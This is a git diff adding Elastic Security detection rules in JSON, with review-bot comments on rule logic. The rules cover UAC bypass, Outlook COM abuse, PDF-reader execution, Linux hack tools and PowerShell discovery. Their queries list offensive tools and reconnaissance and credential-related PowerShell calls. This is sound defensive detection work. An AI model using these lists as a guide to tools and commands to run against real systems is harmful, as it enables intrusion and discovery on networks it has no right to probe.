@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via DiskCleanup Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"/autoclean\" and process.args : \"/d\" and process.executable != null and \n not process.executable : (\"C:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": 
[ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6.json new file mode 100644 index 00000000000..bee0f880229 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects Inter-Process Communication with Outlook via Component Object Model from an unusual process. Adversaries may target user email to collect sensitive information or send email on their behalf via API.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Inter-Process Communication via Outlook", + "query": "sequence with maxspan=1m\n[process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n process.name : (\n \"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cmd.exe\", \"regsvr32.exe\", \"cscript.exe\", \"wscript.exe\"\n ) or\n (\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n (process.Ext.relative_file_creation_time <= 500 or process.Ext.relative_file_name_modify_time <= 500)\n )\n )\n] by process.executable\n[process where host.os.type == \"windows\" and event.action == \"start\" and process.name : \"OUTLOOK.EXE\" and\n process.Ext.effective_parent.name != null] by process.Ext.effective_parent.executable\n", + "references": [ + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/apt29/Archive/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": 
"process.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_107.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_107.json new file mode 100644 index 00000000000..522e046ec17 --- /dev/null 
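Review bot: The two `by` keys of the sequence (`process.executable` and `process.Ext.effective_parent.executable`) carry no host identifier, so across the fleet-wide `logs-endpoint.events.process*` pattern a first-stage start on one host can be joined, within `maxspan=1m`, to an `OUTLOOK.EXE` launch on a different host whose effective parent happens to share the same executable path; the alert is then mis-attributed and a common path such as `cmd.exe` can satisfy the untrusted-signature branch from an unrelated machine. The PDF-reader rule later in this diff scopes its join with `by host.id, ...`; the equivalent fix here is `] by host.id, process.executable` and `] by host.id, process.Ext.effective_parent.executable`. The rule also sets no `timestamp_override`, unlike most sibling rules in this diff that use `event.ingested`, so with `from: now-9m` any ingest lag beyond a few minutes drops events; the same applies to the PDF-reader rule (`1defdd62..._107`), which carries `from: now-120m` but no override either.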
+++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_107.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious file that was written by a PDF reader application and subsequently executed. These processes are often launched via exploitation of PDF applications.", + "from": "now-120m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of File Written or Modified by PDF Reader", + "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by PDF Reader\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation.\n\nThis rule searches for executable files written by PDF reader software and executed in sequence. This is most likely the result of exploitation for privilege escalation or initial access. This rule can also detect suspicious processes masquerading as PDF readers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the PDF documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=2h\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"AcroRd32.exe\" or\n process.name : \"rdrcef.exe\" or\n process.name : \"FoxitPhantomPDF.exe\" or\n process.name : \"FoxitReader.exe\") and\n not (file.name : \"FoxitPhantomPDF.exe\" or\n file.name : \"FoxitPhantomPDFUpdater.exe\" or\n file.name : \"FoxitReader.exe\" or\n file.name : \"FoxitReaderUpdater.exe\" or\n file.name : \"AcroRd32.exe\" or\n file.name : \"rdrcef.exe\")\n ] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1defdd62-cd8d-426e-a246-81a37751bb2b", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "1defdd62-cd8d-426e-a246-81a37751bb2b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_3.json b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_3.json new file mode 100644 index 00000000000..0d12f6190c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_3.json 
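Review bot: The first stage's exclusion list (`not (file.name : "FoxitPhantomPDF.exe" or ... "rdrcef.exe")`) is keyed on bare `file.name` with no path constraint, so an `.exe` the reader writes under one of those names is discarded wherever it lands, which conflicts with the description's claim that the rule also catches processes masquerading as PDF readers. If the intent is only to suppress updater and self-repair activity, anchoring the exclusion on `file.path` to the products' install directories (exact paths to be confirmed against the deployed versions) keeps the suppression without the coverage gap; with `maxspan=2h` and a `by host.id, file.path` join, the second stage already does the right thing once the file passes the first stage. Worth a one-line `note` addition stating that the exclusions are by name only, so analysts tuning the rule understand the trade-off.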
@@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Hack Tool Launched", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\n // exploitation frameworks\n \"crackmapexec\", \"msfconsole\", \"msfvenom\", \"sliver-client\", \"sliver-server\", \"havoc\",\n // network scanners (nmap left out to reduce noise)\n \"zenmap\", \"nuclei\", \"netdiscover\", \"legion\",\n // web enumeration\n \"gobuster\", \"dirbuster\", \"dirb\", \"wfuzz\", \"ffuf\", \"whatweb\", \"eyewitness\",\n // web vulnerability scanning\n \"wpscan\", \"joomscan\", \"droopescan\", \"nikto\", \n // exploitation tools\n \"sqlmap\", \"commix\", \"yersinia\",\n // cracking and brute forcing\n \"john\", \"hashcat\", \"hydra\", \"ncrack\", \"cewl\", \"fcrackzip\", \"rainbowcrack\",\n // host and network\n \"linenum.sh\", \"linpeas.sh\", \"pspy32\", \"pspy32s\", \"pspy64\", \"pspy64s\", \"binwalk\", \"evil-winrm\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + 
"rule_id": "1df1152b-610a-4f48-9d7a-504f6ee5d9da", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "1df1152b-610a-4f48-9d7a-504f6ee5d9da_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106.json new file mode 100644 index 00000000000..e3c3042ccf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106.json 
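Review bot: The `setup` text opens with `This rule requires data coming in from Elastic Defend.` and then documents only the Defend integration, but the `index` list also covers `endgame-*`, `auditbeat-*` and `logs-auditd_manager.auditd-*`, and `related_integrations` and `tags` name Auditd Manager and Elastic Endgame as data sources. Suggest rewording the first line to `This rule requires data from Elastic Defend, Elastic Endgame, Auditbeat or Auditd Manager; the steps below cover the Elastic Defend integration.` so operators on the other sources do not disable the rule as inapplicable. The agent-policy link in the same block also pins `fleet/8.10/` while the neighbouring links use `current`, which will go stale.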
@@ -0,0 +1,276 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to discovery activities. Attackers can use these to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\Microsoft Azure AD Sync\\\\Extensions\\\\AADConnector.psm1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "*ServiceNow MID Server*\\\\agent\\\\scripts\\\\PowerShell\\\\*.psm1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\IMECache\\\\HealthScripts\\\\*\\\\detect.ps1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\TEMP\\\\SDIAG*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Temp\\\\SDIAG*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\SDIAG*" + } + } + } + } + ], + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Discovery Capabilities", + "query": 
"event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADDomain\" or \"Get-ComputerInfo\" or\n \"Get-Disk\" or \"Get-DnsClientCache\" or\n \"Get-GPOReport\" or \"Get-HotFix\" or\n \"Get-LocalUser\" or \"Get-NetFirewallProfile\" or\n \"get-nettcpconnection\" or \"Get-NetAdapter\" or\n \"Get-PhysicalDisk\" or \"Get-Process\" or\n \"Get-PSDrive\" or \"Get-Service\" or\n \"Get-SmbShare\" or \"Get-WinEvent\"\n ) or\n (\n (\"Get-WmiObject\" or \"gwmi\" or \"Get-CimInstance\" or\n \"gcim\" or \"Management.ManagementObjectSearcher\" or\n \"System.Management.ManagementClass\" or\n \"[WmiClass]\" or \"[WMI]\") and\n (\n \"AntiVirusProduct\" or \"CIM_BIOSElement\" or \"CIM_ComputerSystem\" or \"CIM_Product\" or \"CIM_DiskDrive\" or\n \"CIM_LogicalDisk\" or \"CIM_NetworkAdapter\" or \"CIM_StorageVolume\" or \"CIM_OperatingSystem\" or\n \"CIM_Process\" or \"CIM_Service\" or \"MSFT_DNSClientCache\" or \"Win32_BIOS\" or \"Win32_ComputerSystem\" or\n \"Win32_ComputerSystemProduct\" or \"Win32_DiskDrive\" or \"win32_environment\" or \"Win32_Group\" or\n \"Win32_groupuser\" or \"Win32_IP4RouteTable\" or \"Win32_logicaldisk\" or \"Win32_MappedLogicalDisk\" or\n \"Win32_NetworkAdapterConfiguration\" or \"win32_ntdomain\" or \"Win32_OperatingSystem\" or\n \"Win32_PnPEntity\" or \"Win32_Process\" or \"Win32_Product\" or \"Win32_quickfixengineering\" or\n \"win32_service\" or \"Win32_Share\" or \"Win32_UserAccount\"\n )\n ) or\n (\n (\"ADSI\" and \"WinNT\") or\n (\"Get-ChildItem\" and \"sysmondrv.sys\") or\n (\"::GetIPGlobalProperties()\" and \"GetActiveTcpConnections()\") or\n (\"ServiceProcess.ServiceController\" and \"::GetServices\") or\n (\"Diagnostics.Process\" and \"::GetProcesses\") or\n (\"DirectoryServices.Protocols.GroupPolicy\" and \".GetGPOReport()\") or\n (\"DirectoryServices.AccountManagement\" and \"PrincipalSearcher\") or\n (\"NetFwTypeLib.NetFwMgr\" and \"CurrentProfile\") or\n 
(\"NetworkInformation.NetworkInterface\" and \"GetAllNetworkInterfaces\") or\n (\"Automation.PSDriveInfo\") or\n (\"Microsoft.Win32.RegistryHive\")\n ) or\n (\n \"Get-ItemProperty\" and\n (\n \"\\Control\\SecurityProviders\\WDigest\" or\n \"\\microsoft\\windows\\currentversion\\explorer\\runmru\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" or\n \"\\Microsoft\\Windows\\WindowsUpdate\" or\n \"Policies\\Microsoft\\Windows\\Installer\" or\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" or\n (\"\\Services\\SharedAccess\\Parameters\\FirewallPolicy\" and \"EnableFirewall\") or\n (\"Microsoft\\Windows\\CurrentVersion\\Internet Settings\" and \"proxyEnable\")\n )\n ) or\n (\n (\"Directoryservices.Activedirectory\" or\n \"DirectoryServices.AccountManagement\") and \n (\n \"Domain Admins\" or \"DomainControllers\" or\n \"FindAllGlobalCatalogs\" or \"GetAllTrustRelationships\" or\n \"GetCurrentDomain\" or \"GetCurrentForest\"\n ) or\n \"DirectoryServices.DirectorySearcher\" and\n (\n \"samAccountType=805306368\" or\n \"samAccountType=805306369\" or\n \"objectCategory=group\" or\n \"objectCategory=groupPolicyContainer\" or\n \"objectCategory=site\" or\n \"objectCategory=subnet\" or\n \"objectClass=trustedDomain\"\n )\n ) or\n (\n \"Get-Process\" and\n (\n \"mcshield\" or \"windefend\" or \"savservice\" or\n \"TMCCSF\" or \"symantec antivirus\" or\n \"CSFalcon\" or \"TmPfw\" or \"kvoop\"\n )\n )\n ) and\n not powershell.file.script_block_text : (\n (\n \"__cmdletization_BindCommonParameters\" and\n \"Microsoft.PowerShell.Core\\Export-ModuleMember\" and\n \"Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter\"\n ) or\n \"CmdletsToExport=@(\\\"Add-Content\\\",\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + 
"name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1083/" + }, + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + }, + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + }, + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + }, + { + "id": "T1007", + "name": "System Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1007/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106", + "type": "security-rule" +} \ No newline at end of file 
